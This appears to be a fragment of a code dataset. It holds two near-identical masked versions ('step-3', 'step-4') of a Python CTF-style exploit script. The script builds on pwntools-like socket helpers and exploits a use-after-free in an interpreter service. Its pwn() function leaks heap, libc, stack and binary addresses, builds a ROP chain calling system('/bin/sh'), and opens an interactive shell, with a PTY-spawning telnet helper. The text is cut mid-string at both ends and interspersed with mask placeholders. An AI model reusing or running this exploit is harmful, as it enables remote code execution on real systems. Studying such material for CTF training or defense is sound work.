p64(add_rsp_0x48)\n validate(payload, [b'\\n'])\n evl(payload)\n time.sleep(0.5)\n interact()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\n\ndef d(d):\n \"\"\"Decode the given bytes instance using UTF-8.\"\"\"\n return d.decode('UTF-8')\n\n\ndef p32(d):\n \"\"\"Return d packed as 32-bit unsigned integer (little endian).\"\"\"\n return pack('<I', d)\n\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\n\ndef p64(d):\n \"\"\"Return d packed as 64-bit unsigned integer (little endian).\"\"\"\n return pack('<Q', d)\n\n\ndef u64(d):\n \"\"\"Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian).\"\"\"\n return unpack('<Q', d)[0]\n\n\ndef print_good(msg):\n print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_bad(msg):\n print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_info(msg):\n print('[*] ' + msg)\n\n\ndef bytes_and_strings_are_cool(func):\n \"\"\"Decorator to encode arguments that are string instances.\"\"\"\n\n def inner(*args, **kwargs):\n nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else\n arg, args))\n nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else\n (k, v), kwargs))\n return func(*nargs, **nkwargs)\n return inner\n\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert all(b not in data for b in badchars)\n\n\ndef is_printable(b):\n \"\"\"Return true if the given byte is a printable ASCII character.\"\"\"\n return b in e(string.printable)\n\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. 
Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return (b in\n b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n )\n lines = []\n chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for\n b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,\n right, asciiblock))\n return '\\n'.join(lines)\n\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n UNDERLINE = '4'\n BOLD = '1'\n ESCAPE_START = '\\x1b['\n ESCAPE_END = 'm'\n\n\ndef ansi(*args):\n \"\"\"Construct an ANSI terminal escape code.\"\"\"\n code = Term.ESCAPE_START\n code += ';'.join(args)\n code += Term.ESCAPE_END\n return code\n\n\nclass DisconnectException(Exception):\n pass\n\n\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception('Pattern length is way to large')\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return 
''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this sequence.\n\n 'needle' should be of type string or bytes. If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n idx = self._seq.index(needle)\n if self._seq[idx + len(needle):].find(needle) != -1:\n raise ValueError('Multiple occurances found!')\n return idx\n\n\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. 
This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 0\n BINARY = 1\n X = 4\n Y = 16\n Z = 2\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i + 1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n if end - start >= Y + 2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n parts = mergedparts\n buf = ''\n last = None\n for tag, value in parts:\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n buf += d(value)\n last = tag\n buf += ansi(Term.CLEAR)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. 
Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException('Server disconnected.')\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. 
use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024)\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info('Server disconnected.')\n return\n\n\ndef telnet(shell='/bin/bash'):\n \"\"\"Telnet emulation.\n\n Opens a PTY on the remote end and connects the master side to the socket.\n Then spawns a shell connected to the slave end and puts the controlling TTY\n on the local machine into raw mode.\n Result: Something similar to a telnet/(plaintext)ssh session.\n\n Vim, htop, su, less, etc. will work with this.\n\n !!! 
This function only works if the channel is connected to a shell !!!\n \"\"\"\n assert sys.stdin.isatty()\n c.setVerbose(False)\n code = \"import pty; pty.spawn(['{}', '-i'])\".format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5)\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n tty.setraw(sys.stdin)\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n')\n recvtil('READY\\r\\n')\n interact()\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)\n\n\ndef send(b):\n c.send(b)\n\n\ndef sendline(l):\n c.sendline(l)\n\n\ndef sendnum(n):\n c.sendnum(n)\n\n\n<mask token>\n\n\ndef recvtil(delim):\n return c.recvtil(delim)\n\n\ndef recvn(n):\n return c.recvn(n)\n\n\ndef recvline():\n return c.recvline()\n\n\ndef recvregex(r):\n return c.recvregex(r)\n\n\ndef interact():\n c.interact()\n\n\n<mask token>\n\n\ndef evl(code):\n sendline(code)\n\n\ndef readvar(name):\n evl('=')\n recvtil('Bad token: 0-1\\n> ')\n evl(name)\n response = recvtil('> ')\n return response.split(b'\\n')[0]\n\n\ndef readintvar(name):\n return int(d(readvar(name)))\n\n\ndef readstrvar(name):\n return readvar(name)[1:-1]\n\n\ndef heapleak():\n \"\"\"Free the lhs and rhs values during add_assign. 
...\"\"\"\n for i in range(16):\n evl('{}'.format(i))\n evl('h=0+0')\n return readintvar('h') & 18446744073709547520\n\n\ndef gc(remaining):\n \"\"\"Trigger gargabe collection\"\"\"\n for i in range(remaining):\n evl('{}'.format(i))\n\n\ndef leak(addr, length):\n \"\"\"Leaks process memory by abusing the UAF to temporarily inject a fake string.\"\"\"\n fake_str_addr = heap_base + 176\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(15):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n gc(16)\n return readstrvar('a')[0:length]\n\n\ndef leak2(addr, length):\n \"\"\"Same as above, but different offsets...\"\"\"\n fake_str_addr = heap_base + 368\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(12):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n return readstrvar('a')[0:length]\n\n\ndef pwn():\n global heap_base\n recvtil('>')\n evl('x=\"XXXXXXXXXXXXXXXX\"')\n heap_base = heapleak()\n print_good('Heap base @ 0x{:x}'.format(heap_base))\n evl('\"{}\"'.format('A' * 256))\n gc(20 - 4)\n heap_mem = leak(heap_base, 4096)\n for i in range(0, len(heap_mem) - 16, 8):\n flink = u64(heap_mem[i:i + 8])\n blink = u64(heap_mem[i + 8:i + 16])\n if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and \n flink < 140737488355328 and blink > 139637976727552 and blink <\n 140737488355328):\n break\n else:\n print_bad('No freelist pointers found :(')\n return\n libc = flink - 3938600\n print_good('libc @ 0x{:x}'.format(libc))\n env_ptr = u64(leak2(libc + 3949728, 8))\n print_good('stack @ 0x{:x}'.format(env_ptr))\n system = libc + 288144\n bin_sh = libc + 1573123\n pop_rdi = libc + 142234\n pop_rsi = libc + 149637\n pop_rdx = libc + 7054\n add_rsp_0x48 = libc + 1006475\n print_good('/bin/sh @ 0x{:x}'.format(bin_sh))\n input_buf = env_ptr - 808\n print_good('input_buf @ 0x{:x}'.format(input_buf))\n ret_addr = env_ptr - 808 - 8\n print_good('return address @ 
0x{:x}'.format(ret_addr))\n evl('l.a=x')\n evl('h.a=x')\n evl('a.a=x')\n evl('b.a=x')\n evl('c.a=x')\n evl('d.a=x')\n evl('e.a=x')\n evl('f.a=x')\n for i in range(9):\n evl('\"{}\"'.format('A' * 16))\n evl('1337')\n for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:\n for p in ALPHABET:\n evl('{}.{}=x'.format(o, p))\n for i in range(6):\n evl('1337')\n for i in 'ghijk':\n evl('{}=x'.format(i))\n fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265\n ) + b'D' * 240\n evl(b'n=\"' + fake_str + b'\"')\n payload = b'\\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(\n input_buf - 7)\n payload += b'\\x00' * (384 - len(payload))\n evl(b'o=\"' + payload + b'\"')\n fake_str_addr = heap_base + 7808\n evl('p=o+{}'.format(fake_str_addr))\n payload = b'A' * 256\n payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)\n payload += p64(8) + p64(ret_addr)\n evl(payload)\n binary = readstrvar('p')\n binary = u64(binary) - 2769\n print_good('binary @ 0x{:x}'.format(binary))\n offset_to_ret = ret_addr - (input_buf & 18446744073709551360)\n print_good('offset to return address: 0x{:x}'.format(offset_to_ret))\n if offset_to_ret > 40 or offset_to_ret < 0:\n print_bad('Bad offset')\n return\n prop_name = p64(binary + 2761)[1]\n if prop_name < ord('A') or prop_name > ord('z'):\n print_bad('Bad propery name: {}'.format(prop_name))\n return\n prop_name = chr(prop_name)\n print_good('property name: {}'.format(prop_name))\n payload = b'A' * 56\n payload += p64(pop_rdi)\n payload += p64(bin_sh)\n payload += p64(system)\n validate(payload, [b'\\n'])\n evl(payload)\n evl('{}=42'.format(prop_name))\n payload = b'A' * offset_to_ret\n payload += p64(add_rsp_0x48)\n validate(payload, [b'\\n'])\n evl(payload)\n time.sleep(0.5)\n interact()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\n\ndef d(d):\n \"\"\"Decode the given bytes instance using UTF-8.\"\"\"\n return d.decode('UTF-8')\n\n\ndef p32(d):\n \"\"\"Return d packed as 32-bit unsigned integer (little endian).\"\"\"\n return pack('<I', d)\n\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\n\ndef p64(d):\n \"\"\"Return d packed as 64-bit unsigned integer (little endian).\"\"\"\n return pack('<Q', d)\n\n\ndef u64(d):\n \"\"\"Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian).\"\"\"\n return unpack('<Q', d)[0]\n\n\ndef print_good(msg):\n print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_bad(msg):\n print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_info(msg):\n print('[*] ' + msg)\n\n\ndef bytes_and_strings_are_cool(func):\n \"\"\"Decorator to encode arguments that are string instances.\"\"\"\n\n def inner(*args, **kwargs):\n nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else\n arg, args))\n nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else\n (k, v), kwargs))\n return func(*nargs, **nkwargs)\n return inner\n\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert all(b not in data for b in badchars)\n\n\ndef is_printable(b):\n \"\"\"Return true if the given byte is a printable ASCII character.\"\"\"\n return b in e(string.printable)\n\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. 
Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return (b in\n b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n )\n lines = []\n chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for\n b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,\n right, asciiblock))\n return '\\n'.join(lines)\n\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n UNDERLINE = '4'\n BOLD = '1'\n ESCAPE_START = '\\x1b['\n ESCAPE_END = 'm'\n\n\ndef ansi(*args):\n \"\"\"Construct an ANSI terminal escape code.\"\"\"\n code = Term.ESCAPE_START\n code += ';'.join(args)\n code += Term.ESCAPE_END\n return code\n\n\nclass DisconnectException(Exception):\n pass\n\n\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception('Pattern length is way to large')\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return 
''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this sequence.\n\n 'needle' should be of type string or bytes. If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n idx = self._seq.index(needle)\n if self._seq[idx + len(needle):].find(needle) != -1:\n raise ValueError('Multiple occurances found!')\n return idx\n\n\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. 
This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 0\n BINARY = 1\n X = 4\n Y = 16\n Z = 2\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i + 1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n if end - start >= Y + 2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n parts = mergedparts\n buf = ''\n last = None\n for tag, value in parts:\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n buf += d(value)\n last = tag\n buf += ansi(Term.CLEAR)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. 
Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException('Server disconnected.')\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. 
use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024)\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info('Server disconnected.')\n return\n\n\ndef telnet(shell='/bin/bash'):\n \"\"\"Telnet emulation.\n\n Opens a PTY on the remote end and connects the master side to the socket.\n Then spawns a shell connected to the slave end and puts the controlling TTY\n on the local machine into raw mode.\n Result: Something similar to a telnet/(plaintext)ssh session.\n\n Vim, htop, su, less, etc. will work with this.\n\n !!! 
This function only works if the channel is connected to a shell !!!\n \"\"\"\n assert sys.stdin.isatty()\n c.setVerbose(False)\n code = \"import pty; pty.spawn(['{}', '-i'])\".format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5)\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n tty.setraw(sys.stdin)\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n')\n recvtil('READY\\r\\n')\n interact()\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)\n\n\ndef send(b):\n c.send(b)\n\n\ndef sendline(l):\n c.sendline(l)\n\n\ndef sendnum(n):\n c.sendnum(n)\n\n\ndef recv(n):\n return c.recv(n)\n\n\ndef recvtil(delim):\n return c.recvtil(delim)\n\n\ndef recvn(n):\n return c.recvn(n)\n\n\ndef recvline():\n return c.recvline()\n\n\ndef recvregex(r):\n return c.recvregex(r)\n\n\ndef interact():\n c.interact()\n\n\n<mask token>\n\n\ndef evl(code):\n sendline(code)\n\n\ndef readvar(name):\n evl('=')\n recvtil('Bad token: 0-1\\n> ')\n evl(name)\n response = recvtil('> ')\n return response.split(b'\\n')[0]\n\n\ndef readintvar(name):\n return int(d(readvar(name)))\n\n\ndef readstrvar(name):\n return readvar(name)[1:-1]\n\n\ndef heapleak():\n \"\"\"Free the lhs and rhs values during add_assign. 
...\"\"\"\n for i in range(16):\n evl('{}'.format(i))\n evl('h=0+0')\n return readintvar('h') & 18446744073709547520\n\n\ndef gc(remaining):\n \"\"\"Trigger gargabe collection\"\"\"\n for i in range(remaining):\n evl('{}'.format(i))\n\n\ndef leak(addr, length):\n \"\"\"Leaks process memory by abusing the UAF to temporarily inject a fake string.\"\"\"\n fake_str_addr = heap_base + 176\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(15):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n gc(16)\n return readstrvar('a')[0:length]\n\n\ndef leak2(addr, length):\n \"\"\"Same as above, but different offsets...\"\"\"\n fake_str_addr = heap_base + 368\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(12):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n return readstrvar('a')[0:length]\n\n\ndef pwn():\n global heap_base\n recvtil('>')\n evl('x=\"XXXXXXXXXXXXXXXX\"')\n heap_base = heapleak()\n print_good('Heap base @ 0x{:x}'.format(heap_base))\n evl('\"{}\"'.format('A' * 256))\n gc(20 - 4)\n heap_mem = leak(heap_base, 4096)\n for i in range(0, len(heap_mem) - 16, 8):\n flink = u64(heap_mem[i:i + 8])\n blink = u64(heap_mem[i + 8:i + 16])\n if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and \n flink < 140737488355328 and blink > 139637976727552 and blink <\n 140737488355328):\n break\n else:\n print_bad('No freelist pointers found :(')\n return\n libc = flink - 3938600\n print_good('libc @ 0x{:x}'.format(libc))\n env_ptr = u64(leak2(libc + 3949728, 8))\n print_good('stack @ 0x{:x}'.format(env_ptr))\n system = libc + 288144\n bin_sh = libc + 1573123\n pop_rdi = libc + 142234\n pop_rsi = libc + 149637\n pop_rdx = libc + 7054\n add_rsp_0x48 = libc + 1006475\n print_good('/bin/sh @ 0x{:x}'.format(bin_sh))\n input_buf = env_ptr - 808\n print_good('input_buf @ 0x{:x}'.format(input_buf))\n ret_addr = env_ptr - 808 - 8\n print_good('return address @ 
0x{:x}'.format(ret_addr))\n evl('l.a=x')\n evl('h.a=x')\n evl('a.a=x')\n evl('b.a=x')\n evl('c.a=x')\n evl('d.a=x')\n evl('e.a=x')\n evl('f.a=x')\n for i in range(9):\n evl('\"{}\"'.format('A' * 16))\n evl('1337')\n for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:\n for p in ALPHABET:\n evl('{}.{}=x'.format(o, p))\n for i in range(6):\n evl('1337')\n for i in 'ghijk':\n evl('{}=x'.format(i))\n fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265\n ) + b'D' * 240\n evl(b'n=\"' + fake_str + b'\"')\n payload = b'\\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(\n input_buf - 7)\n payload += b'\\x00' * (384 - len(payload))\n evl(b'o=\"' + payload + b'\"')\n fake_str_addr = heap_base + 7808\n evl('p=o+{}'.format(fake_str_addr))\n payload = b'A' * 256\n payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)\n payload += p64(8) + p64(ret_addr)\n evl(payload)\n binary = readstrvar('p')\n binary = u64(binary) - 2769\n print_good('binary @ 0x{:x}'.format(binary))\n offset_to_ret = ret_addr - (input_buf & 18446744073709551360)\n print_good('offset to return address: 0x{:x}'.format(offset_to_ret))\n if offset_to_ret > 40 or offset_to_ret < 0:\n print_bad('Bad offset')\n return\n prop_name = p64(binary + 2761)[1]\n if prop_name < ord('A') or prop_name > ord('z'):\n print_bad('Bad propery name: {}'.format(prop_name))\n return\n prop_name = chr(prop_name)\n print_good('property name: {}'.format(prop_name))\n payload = b'A' * 56\n payload += p64(pop_rdi)\n payload += 